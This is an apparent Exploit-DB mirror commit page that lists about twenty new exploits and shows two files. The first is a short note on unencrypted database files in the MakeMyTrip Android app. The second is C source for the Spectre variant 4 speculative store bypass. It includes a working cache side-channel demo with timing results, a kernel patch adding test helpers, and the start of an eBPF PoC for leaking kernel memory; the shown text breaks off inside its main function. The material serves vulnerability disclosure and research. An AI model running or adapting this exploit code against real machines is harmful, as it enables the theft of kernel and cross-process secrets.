bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-05-23

Browse source 
20 changes to exploits/shellcodes

Siemens SIMATIC S7-1500 CPU - Remote Denial of Service
Microsoft Edge Chakra JIT - Magic Value Type Confusion
AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass
Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read
MakeMyTrip 7.2.4 - Information Disclosure
Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)
Microsoft Windows - 'POP/MOV SS' Privilege Escalation

Multiplayer BlackJack Online Casino Game 2.5 - Persistent Cross-Site Scripting
Multiplayer BlackJack Online Casino Game 2.5 - Cross-Site Scripting
Zechat 1.5 - SQL Injection / Cross-Site Request Forgery

Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
Healwire Online Pharmacy 3.0 - Cross-Site Scripting / Cross-Site Request Forgery
Private Message PHP Script 2.0 - Persistent Cross-Site Scripting
Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
Private Message PHP Script 2.0 - Cross-Site Scripting
Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Cross-Site Scripting / Cross-Site Request Forgery

ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting
ManageEngine Recovery Manager Plus 5.3 - Cross-Site Scripting

Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass
Auto Dealership & Vehicle Showroom WebSys 1.0 - Multiple Vulnerabilities
Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass
Wchat PHP AJAX Chat Script  1.5 - Persistent Cross-Site Scripting
Model Agency Media House & Model Gallery 1.0 - Multiple Vulnerabilities
Wchat PHP AJAX Chat Script  1.5 - Cross-Site Scripting
Nordex N149/4.0-4.5 - SQL Injection
WebSocket Live Chat - Cross-Site Scripting
Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting
PaulPrinting CMS Printing 1.0 - SQL Injection
iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery
ERPnext 11 - Cross-Site Scripting
NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection
Auto Car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting
NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection
Feedy RSS News Ticker 2.0 - 'cat' SQL Injection
NewsBee CMS 1.4 - 'download.php' SQL Injection
Easy File Uploader 1.7 - SQL Injection / Cross-Site Scripting
This commit is contained in:
Offensive Security 2018-05-23 05:01:45 +00:00
parent 08c35595ed
commit 7bbc323854
21 changed files with 1850 additions and 8 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

24
exploits/android/local/44690.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: Android Application MakeMyTrip 7.2.4 - Unencrypted Database Files
# Date: 2018-05-21
# Software Link: MakeMyTrip v7.2.4 Android Application
# Exploit Author: Divya Jain
# Version: 7.2.4 Android App
# CVE: CVE-2018-11242
# Category: Mobileapps
# Tested on: Android v5.1
# 1. Description
# Android application folder was found to contain SQLite database files in the following subdirectory
# data/com.makemytrip/Cache and data/com.makemytrip/databses. This directory is used to store the applications databases.
# The confidential information can be retrieved from the SQLite databases and stored in cleartext.
# As an impact it is known to affect confidentiality, integrity, and availability.
# 2. Proof-of-Concept
# The successful exploitation needs a single authentication and filesystem can be accessed, after rooting an android device.
# After accessing the directories below
/data/com.makemytrip/databases/
/data/com.makemytrip/cache/
# Above directories can be seen with unencrypted version of database files stored in the device
# which can further lead to sensitive information disclosure.

994
exploits/hardware/dos/44695.c Normal file
View file

@ -0,0 +1,994 @@
/*
======== Intro / Overview ========
After Michael Schwarz made some interesting observations, we started
looking into variants other than the three already-known ones.
I noticed that Intel's Optimization Manual says in
section 2.4.4.5 ("Memory Disambiguation"):
A load instruction micro-op may depend on a preceding store. Many
microarchitectures block loads until all preceding store address
are known.
The memory disambiguator predicts which loads will not depend on
any previous stores. When the disambiguator predicts that a load
does not have such a dependency, the load takes its data from the
L1 data cache.
Eventually, the prediction is verified. If an actual conflict is
detected, the load and all succeeding instructions are re-executed.
According to my experiments, this effect can be used to cause
speculative execution to continue far enough to execute a
Spectre-style gadget on a pointer read from a memory slot to which a
store has been speculatively ignored. I have tested this behavior on
the following processors from Intel and AMD:
- Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz [Skylake laptop]
- AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G [AMD desktop]
- Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz [Haswell desktop]
I haven't yet tested this on any ARM CPU.
Interestingly, only on the Skylake laptop, it seems to work when
interrupts and SMP are disabled while the test is running; on the
other machines, it seems to only work when interrupts are enabled,
maybe because the kernel code cause some noise that garbles some
predictor state or so? Or just because they mess up timing
somewhere...
There were mentions of data speculation on the netdev list, in a
somewhat different context:
https://www.mail-archive.com/netdev@vger.kernel.org/msg212262.html
https://www.mail-archive.com/netdev@vger.kernel.org/msg215369.html
However, I'm not entirely sure about the terminology. Do
"data speculation" and "value speculation" include speculating about
the *source* of data, or do they refer exclusively to directly
speculating about the *value* of data?
======== Demo code (no privilege boundaries crossed) ========
This is some code that purely demonstrates the basic effect and shows
that it is possible to combine it with a Meltdown/Spectre-style
gadget for leaking data into the cache. It does not cross any
privilege boundaries.
----------------------- START -----------------------
// compile with: gcc -o test test.c -Wall -DHIT_THRESHOLD={CYCLES}
// optionally add: -DNO_INTERRUPTS
#include <stdio.h>
#include <sys/io.h>
#include <err.h>
#include <sys/mman.h>
#define pipeline_flush() asm volatile("mov $0,
%%eax\n\tcpuid\n\tlfence" : /*out*/ : /*in*/ :
"rax","rbx","rcx","rdx","memory")
#define clflush(addr) asm volatile("clflush (%0)"::"r"(addr):"memory")
// source of high-latency pointer to the memory slot
unsigned char **flushy_area[1000];
#define flushy (flushy_area+500)
// memory slot on which we want bad memory disambiguation
unsigned char *memory_slot_area[1000];
#define memory_slot (memory_slot_area+500)
// 0123456789abcdef
unsigned char secret_read_area[] = "0000011011101011";
unsigned char public_read_area[] = "################";
unsigned char timey_line_area[0x200000];
// stored in the memory slot first
#define timey_lines (timey_line_area + 0x10000)
unsigned char dummy_char_sink;
int testfun(int idx) {
pipeline_flush();
*flushy = memory_slot;
*memory_slot = secret_read_area;
timey_lines['0' << 12] = 1;
timey_lines['1' << 12] = 1;
pipeline_flush();
clflush(flushy);
clflush(&timey_lines['0' << 12]);
clflush(&timey_lines['1' << 12]);
asm volatile("mfence");
pipeline_flush();
// START OF CRITICAL PATH
unsigned char **memory_slot__slowptr = *flushy;
//pipeline_flush();
// the following store will be speculatively ignored since its
address is unknown
*memory_slot__slowptr = public_read_area;
// uncomment the instructions in the next line to break the attack
asm volatile("" /*"mov $0, %%eax\n\tcpuid\n\tlfence"*/ : /*out*/ :
/*in*/ : "rax","rbx","rcx","rdx","memory");
// architectual read from dummy_timey_line, possible
microarchitectural read from timey_line
dummy_char_sink = timey_lines[(*memory_slot)[idx] << 12];
// END OF CRITICAL PATH
unsigned int t1, t2;
pipeline_flush();
asm volatile(
"lfence\n\t"
"rdtscp\n\t"
"mov %%eax, %%ebx\n\t"
"mov (%%rdi), %%r11\n\t"
"rdtscp\n\t"
"lfence\n\t"
://out
"=a"(t2),
"=b"(t1)
://in
"D"(timey_lines + 0x1000 * '0')
://clobber
"r11",
"rcx",
"rdx",
"memory"
);
pipeline_flush();
unsigned int delay_0 = t2 - t1;
pipeline_flush();
asm volatile(
"lfence\n\t"
"rdtscp\n\t"
"mov %%eax, %%ebx\n\t"
"mov (%%rdi), %%r11\n\t"
"rdtscp\n\t"
"lfence\n\t"
://out
"=a"(t2),
"=b"(t1)
://in
"D"(timey_lines + 0x1000 * '1')
://clobber
"r11",
"rcx",
"rdx",
"memory"
);
pipeline_flush();
unsigned int delay_1 = t2 - t1;
if (delay_0 < HIT_THRESHOLD && delay_1 > HIT_THRESHOLD) {
pipeline_flush();
return 0;
}
if (delay_0 > HIT_THRESHOLD && delay_1 < HIT_THRESHOLD) {
pipeline_flush();
return 1;
}
pipeline_flush();
return -1;
}
int main(void) {
char out[100000];
char *out_ = out;
#ifdef NO_INTERRUPTS
if (mlockall(MCL_CURRENT|MCL_FUTURE) || iopl(3))
err(1, "iopl(3)");
#endif
for (int idx = 0; idx < 16; idx++) {
#ifdef NO_INTERRUPTS
asm volatile("cli");
#endif
pipeline_flush();
long cycles = 0;
int hits = 0;
char results[33] = {0};
/* if we don't break the loop after some time when it doesn't
work, in NO_INTERRUPTS mode with SMP disabled, the machine will lock
up */
while (hits < 32 && cycles < 1000000) {
pipeline_flush();
int res = testfun(idx);
if (res != -1) {
pipeline_flush();
results[hits] = res + '0';
hits++;
}
cycles++;
pipeline_flush();
}
pipeline_flush();
#ifdef NO_INTERRUPTS
asm volatile("sti");
#endif
out_ += sprintf(out_, "%c: %s in %ld cycles (hitrate: %f%%)\n",
secret_read_area[idx], results, cycles, 100*hits/(double)cycles);
}
printf("%s", out);
pipeline_flush();
}
----------------------- END -----------------------
Results:
In the following, "SMP off" means that I have executed this
command:
# for file in /sys/devices/system/cpu/cpu*/online; do echo 0 > $file; done
For the Intel machines, "turbo off" means that I've executed the
following command:
# echo 1 > /sys/devices/system/cpu/intel_pstate/no_turbo
Skylake laptop, normal:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50
$ ./test
0: 00000000000000000000000000000000 in 61944 cycles (hitrate: 0.051660%)
0: 00000000000000000000000000000000 in 36467 cycles (hitrate: 0.087751%)
0: 00000000000000000000000000000000 in 36788 cycles (hitrate: 0.086985%)
0: 00000000000000000000000000000000 in 36800 cycles (hitrate: 0.086957%)
0: 00000000000000000000000000000000 in 35797 cycles (hitrate: 0.089393%)
1: 11111111111111111111111111111111 in 48923 cycles (hitrate: 0.065409%)
1: 11111111111111111111111111111111 in 44525 cycles (hitrate: 0.071870%)
0: 00000000000000000000000000000000 in 44813 cycles (hitrate: 0.071408%)
1: 11111111111111111111111111111111 in 40625 cycles (hitrate: 0.078769%)
1: 11111111111111111111111111111111 in 40897 cycles (hitrate: 0.078245%)
1: 11111111111111111111111111111111 in 39648 cycles (hitrate: 0.080710%)
0: 00000000000000000000000000000000 in 40737 cycles (hitrate: 0.078553%)
1: 11111111111111111111111111111111 in 37850 cycles (hitrate: 0.084544%)
0: 00000000000000000000000000000000 in 46062 cycles (hitrate: 0.069472%)
1: 11111111111111111111111111111111 in 44929 cycles (hitrate: 0.071223%)
1: 11111111111111111111111111111111 in 37465 cycles (hitrate: 0.085413%)
Skylake laptop, SMP off, interrupts off, turbo off:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS
$ sudo ./test
0: 00000000000000000000000000000000 in 34697 cycles (hitrate: 0.092227%)
0: 00000000000000000000000000000000 in 32625 cycles (hitrate: 0.098084%)
0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%)
0: 00000000000000000000000000000000 in 34680 cycles (hitrate: 0.092272%)
0: 00000000000000000000000000000000 in 32302 cycles (hitrate: 0.099065%)
1: 11111111111111111111111111111111 in 33240 cycles (hitrate: 0.096270%)
1: 11111111111111111111111111111111 in 33738 cycles (hitrate: 0.094849%)
0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
1: 11111111111111111111111111111111 in 32531 cycles (hitrate: 0.098368%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
0: 00000000000000000000000000000000 in 32193 cycles (hitrate: 0.099400%)
1: 11111111111111111111111111111111 in 32167 cycles (hitrate: 0.099481%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
Haswell PC, normal:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50
$ ./test
0: 00000000000000000000000000000000 in 119737 cycles (hitrate: 0.026725%)
0: 00000000000000000000000000000000 in 45340 cycles (hitrate: 0.070578%)
0: 00000000000000000000000000000000 in 39127 cycles (hitrate: 0.081785%)
0: 00000000000000000000000000000000 in 39567 cycles (hitrate: 0.080875%)
0: 00000000000000000000000000000000 in 35164 cycles (hitrate: 0.091002%)
1: 11111111111111111111111111111111 in 33770 cycles (hitrate: 0.094759%)
1: 11111111111111111111111111111111 in 36743 cycles (hitrate: 0.087091%)
0: 00000000000000000000000000000000 in 36749 cycles (hitrate: 0.087077%)
1: 11111111111111111111111111111111 in 35686 cycles (hitrate: 0.089671%)
1: 11111111111111111111111111111111 in 35843 cycles (hitrate: 0.089278%)
1: 11111111111111111111111111111111 in 35826 cycles (hitrate: 0.089321%)
0: 00000000000000000000000000000000 in 35302 cycles (hitrate: 0.090646%)
1: 11111111111111111111111111111111 in 34256 cycles (hitrate: 0.093414%)
0: 00000000000000000000000000000000 in 36604 cycles (hitrate: 0.087422%)
1: 11111111111111111111111111111111 in 36795 cycles (hitrate: 0.086968%)
1: 11111111111111111111111111111111 in 37820 cycles (hitrate: 0.084611%)
Haswell PC, SMP off, interrupts off, turbo off:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS
$ sudo ./test
0: 00000000000000000000000000000000 in 32770 cycles (hitrate: 0.097650%)
0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%)
0: 00000000000000000000000000000000 in 32783 cycles (hitrate: 0.097612%)
0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)
0: 00000000000000000000000000000000 in 37455 cycles (hitrate: 0.085436%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
0: 00000000000000000000000000000000 in 39894 cycles (hitrate: 0.080213%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: 11111111111111111111111111111111 in 33845 cycles (hitrate: 0.094549%)
0: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
0: 00000000000000000000000000000000 in 44050 cycles (hitrate: 0.072645%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
AMD desktop, normal:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99
$ ./test
0: 0000000000000000000000000 in 1000000 cycles (hitrate: 0.002500%)
0: 000000000000000000000 in 1000000 cycles (hitrate: 0.002100%)
0: 00000000000000000000000000000000 in 939816 cycles (hitrate: 0.003405%)
0: 00000000000000000000000000000000 in 903838 cycles (hitrate: 0.003540%)
0: 00000000000000000000000000000000 in 360430 cycles (hitrate: 0.008878%)
1: 11111111111111111111111111111111 in 484242 cycles (hitrate: 0.006608%)
1: 11111111111111111111111111111111 in 331271 cycles (hitrate: 0.009660%)
0: 00000000000000000000000000000000 in 388049 cycles (hitrate: 0.008246%)
1: 11111111111111111111111111111111 in 282588 cycles (hitrate: 0.011324%)
1: 11111111111111111111111111111111 in 359558 cycles (hitrate: 0.008900%)
1: 11111111111111111111111111111111 in 359013 cycles (hitrate: 0.008913%)
0: 0000000000000000000000000000000 in 1000000 cycles (hitrate: 0.003100%)
1: 11111111111111111111111111111111 in 501067 cycles (hitrate: 0.006386%)
0: 00000000000000000000000000000000 in 312420 cycles (hitrate: 0.010243%)
1: 11111111111111111111111111111111 in 784663 cycles (hitrate: 0.004078%)
1: 11111111111111111111111111111111 in 954189 cycles (hitrate: 0.003354%)
AMD desktop, SMP off, interrupts off:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99 -DNO_INTERRUPTS
$ sudo ./test
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: in 1000000 cycles (hitrate: 0.000000%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
======== assisted BPF PoC ========
This is a PoC that demonstrates that this issue can potentially be
used to attack the Linux kernel's BPF subsystem.
This is *NOT* a full exploit against BPF; this is a PoC that requires
kernel patches that permit the PoC to flush kernel memory from inside
BPF and to measure access times to BPF arrays. It seems probable that
these restrictions could be overcome, but my PoC doesn't do that.
The basic idea here is to cause a speculative type confusion:
1. Store a number N at address A on the stack.
2. Write a pointer P to address A, using a high-latency
expression to compute A.
3. Read a value X from address A, with A specified using a low-latency
expression. Architecturally, X is P; however, microarchitecturally,
X can be N.
4. Use the Spectre/Meltdown gadget to leak the value X points to into
the cache.
The attack benefits from the unique property of eBPF that the engine
performs relatively complicated value tracking, but does not
normally use the resulting information to modify the code in any way
(e.g. by optimizing things away). It is not clear how applicable this
attack would be to e.g. other scripting languages, or whether it is an
issue for non-scripting code.
I have only tested this PoC on an Intel Skylake CPU.
Kernel patch required for the PoC to work (copy attached, so that it
applies cleanly), to be applied to the 4.15.1 stable kernel:
----------------------- START -----------------------
diff --git a/include/linux/bpf.h b/include/linux/bpf.h
index 0b25cf87b6d6..896b4f483fe2 100644
--- a/include/linux/bpf.h
+++ b/include/linux/bpf.h
@@ -591,6 +591,7 @@ extern const struct bpf_func_proto bpf_skb_vlan_push_proto;
extern const struct bpf_func_proto bpf_skb_vlan_pop_proto;
extern const struct bpf_func_proto bpf_get_stackid_proto;
extern const struct bpf_func_proto bpf_sock_map_update_proto;
+extern const struct bpf_func_proto bpf_clflush_mfence_proto;
/* Shared helpers among cBPF and eBPF. */
void bpf_user_rnd_init_once(void);
diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
index 3d24e238221e..379dc888cb81 100644
--- a/kernel/bpf/helpers.c
+++ b/kernel/bpf/helpers.c
@@ -179,3 +179,17 @@ const struct bpf_func_proto bpf_get_current_comm_proto = {
.arg1_type = ARG_PTR_TO_UNINIT_MEM,
.arg2_type = ARG_CONST_SIZE,
};
+
+BPF_CALL_1(bpf_clflush_mfence, void *, target) {
+ asm volatile("mfence\n\tclflush (%0)\n\tmfence"::"r"(target):"memory");
+ return 0;
+}
+
+const struct bpf_func_proto bpf_clflush_mfence_proto = {
+ .func = bpf_clflush_mfence,
+ .ret_type = RET_INTEGER,
+ /* theoretically permits CLFLUSH on invalid addresses,
+ * but the PoC doesn't do that
+ */
+ .arg1_type = ARG_DONTCARE
+};
diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
index 5cb783fc8224..2dd9a2a95630 100644
--- a/kernel/bpf/syscall.c
+++ b/kernel/bpf/syscall.c
@@ -605,6 +605,85 @@ static int map_lookup_elem(union bpf_attr *attr)
return err;
}
+static int map_time_flush_loc(union bpf_attr *attr)
+{
+ void __user *ukey = u64_to_user_ptr(attr->key);
+ void __user *uvalue = u64_to_user_ptr(attr->value);
+ int ufd = attr->map_fd;
+ struct bpf_map *map;
+ void *key, *ptr;
+ struct fd f;
+ int err = 0;
+ u64 delay = 0;
+
+ f = fdget(ufd);
+ map = __bpf_map_get(f);
+ if (IS_ERR(map))
+ return PTR_ERR(map);
+
+ if (!(f.file->f_mode & FMODE_CAN_READ)) {
+ err = -EPERM;
+ goto err_put;
+ }
+
+ if (map->map_type != BPF_MAP_TYPE_ARRAY) {
+ err = -EINVAL;
+ goto err_put;
+ }
+
+ if (attr->flags > 0x100000 || attr->flags >= map->value_size) {
+ err = -EINVAL;
+ goto err_put;
+ }
+ asm volatile("lfence");
+
+ key = memdup_user(ukey, map->key_size);
+ if (IS_ERR(key)) {
+ err = PTR_ERR(key);
+ goto err_put;
+ }
+
+ rcu_read_lock();
+ ptr = map->ops->map_lookup_elem(map, key);
+ if (ptr) {
+ unsigned int t1, t2;
+ ptr = (char*)ptr + attr->flags;
+ asm volatile(
+ "xor %%r11, %%r11\n\t"
+ "lfence\n\t"
+ "rdtscp\n\t"
+ "mov %%eax, %%ebx\n\t"
+ "mov (%%rdi), %%r11b\n\t"
+ "rdtscp\n\t"
+ "mfence\n\t"
+ "clflush (%%rdi)\n\t"
+ "mfence\n\t"
+ ://out
+ "=a"(t2),
+ "=b"(t1)
+ ://in
+ "D"(ptr)
+ ://clobber
+ "r11",
+ "rcx",
+ "rdx",
+ "memory"
+ );
+ delay = t2 - t1;
+ }
+ rcu_read_unlock();
+ if (copy_to_user(uvalue, &delay, 8)) {
+ err = -EINVAL;
+ goto free_key;
+ }
+
+free_key:
+ kfree(key);
+err_put:
+ fdput(f);
+ return err;
+}
+
#define BPF_MAP_UPDATE_ELEM_LAST_FIELD flags
static int map_update_elem(union bpf_attr *attr)
@@ -1713,6 +1792,9 @@ SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr
__user *, uattr, unsigned int, siz
case BPF_MAP_UPDATE_ELEM:
err = map_update_elem(&attr);
break;
+ case 0x13370001:
+ err = map_time_flush_loc(&attr);
+ break;
case BPF_MAP_DELETE_ELEM:
err = map_delete_elem(&attr);
break;
diff --git a/net/core/filter.c b/net/core/filter.c
index 1c0eb436671f..e310a345054c 100644
--- a/net/core/filter.c
+++ b/net/core/filter.c
@@ -3347,6 +3347,8 @@ bpf_base_func_proto(enum bpf_func_id func_id)
return &bpf_tail_call_proto;
case BPF_FUNC_ktime_get_ns:
return &bpf_ktime_get_ns_proto;
+ case 4:
+ return &bpf_clflush_mfence_proto;
case BPF_FUNC_trace_printk:
if (capable(CAP_SYS_ADMIN))
return bpf_get_trace_printk_proto();
----------------------- END -----------------------
The PoC:
----------------------- START -----------------------
*/
#define _GNU_SOURCE
#include <pthread.h>
#include <assert.h>
#include <err.h>
#include <stdint.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <asm/unistd_64.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <pthread.h>
#include <errno.h>
#include <limits.h>
#include <stdbool.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stddef.h>
#include <signal.h>
#include <string.h>
#include <ctype.h>
#include <sys/mman.h>
#include <sys/user.h>
#define GPLv2 "GPL v2"
#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))
/* registers */
/* caller-saved: r0..r5 */
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_REG_CTX BPF_REG_6
#define BPF_REG_FP BPF_REG_10
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_DW | BPF_IMM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = (__u32) (IMM) }), \
((struct bpf_insn) { \
.code = 0, /* zero is reserved opcode */ \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = ((__u64) (IMM)) >> 32 })
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
((struct bpf_insn) { \
.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_EMIT_CALL(FUNC) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_CALL, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = (FUNC) })
#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_EXIT_INSN() \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_EXIT, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = 0 })
#define BPF_LD_ABS(SIZE, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_ALU64_REG(OP, DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
int bpf_(int cmd, union bpf_attr *attrs) {
return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}
int array_create(int value_size, int num_entries) {
union bpf_attr create_map_attrs = {
.map_type = BPF_MAP_TYPE_ARRAY,
.key_size = 4,
.value_size = value_size,
.max_entries = num_entries
};
int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
if (mapfd == -1)
err(1, "map create");
return mapfd;
}
unsigned int array_time_flush_loc(int mapfd, uint32_t idx, uint32_t off) {
uint64_t time;
union bpf_attr attr = {
.map_fd = mapfd,
.key = (uint64_t)&idx,
.value = (uint64_t)&time,
.flags = off,
};
int res = bpf_(0x13370001, &attr);
if (res)
err(1, "map flush loc");
return time;
}
void array_set_dw(int mapfd, uint32_t key, uint64_t value) {
union bpf_attr attr = {
.map_fd = mapfd,
.key = (uint64_t)&key,
.value = (uint64_t)&value,
.flags = BPF_ANY,
};
int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);
if (res)
err(1, "map update elem");
}
int prog_load(struct bpf_insn *insns, size_t insns_count) {
char verifier_log[100000];
union bpf_attr create_prog_attrs = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insn_cnt = insns_count,
.insns = (uint64_t)insns,
.license = (uint64_t)GPLv2,
.log_level = 1,
.log_size = sizeof(verifier_log),
.log_buf = (uint64_t)verifier_log
};
int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
int errno_ = errno;
//printf("==========================\n%s==========================\n",
verifier_log);
errno = errno_;
if (progfd == -1)
err(1, "prog load");
return progfd;
}
int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) {
int progfd = prog_load(insns, insns_count);
// hook eBPF program up to a socket
// sendmsg() to the socket will trigger the filter
// returning 0 in the filter should toss the packet
int socks[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
err(1, "socketpair");
if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
err(1, "setsockopt");
return socks[1];
}
void trigger_proc(int sockfd) {
if (write(sockfd, "X", 1) != 1)
err(1, "write to proc socket failed");
}
int input_map, leak_map;
int sockfds[16];
int leak_bit(unsigned long addr, int bit) {
array_set_dw(input_map, 0, addr);
int count_0 = 0, count_1 = 0;
while (count_0 + count_1 < 100) {
array_time_flush_loc(leak_map, 0, 2048+0x1000);
trigger_proc(sockfds[bit+8]);
unsigned int t1 = array_time_flush_loc(leak_map, 0, 2048+0x1000);
array_time_flush_loc(leak_map, 0, 2048);
trigger_proc(sockfds[bit+0]);
unsigned int t0 = array_time_flush_loc(leak_map, 0, 2048);
//printf("%u %u\n", t0, t1);
if (t0 < 50)
count_0++;
if (t1 < 50)
count_1++;
}
printf("%d vs %d\n", count_0, count_1);
return (count_0 > count_1) ? 0 : 1;
}
int leak_byte(unsigned long addr) {
int byte = 0;
for (int bit=0; bit<8; bit++) {
byte |= leak_bit(addr, bit)<<bit;
}
return byte;
}
int main(int argc, char **argv) {
setbuf(stdout, NULL);
input_map = array_create(8, 1);
leak_map = array_create(0x3000, 1);
if (argc != 3)
errx(1, "invocation (expects addr and length)");
#define BPF_REG_CONFUSED_SLOT BPF_REG_6
#define BPF_REG_SLOW_SLOT BPF_REG_7
#define BPF_REG_CONFUSED_SLOT_ALIAS BPF_REG_8
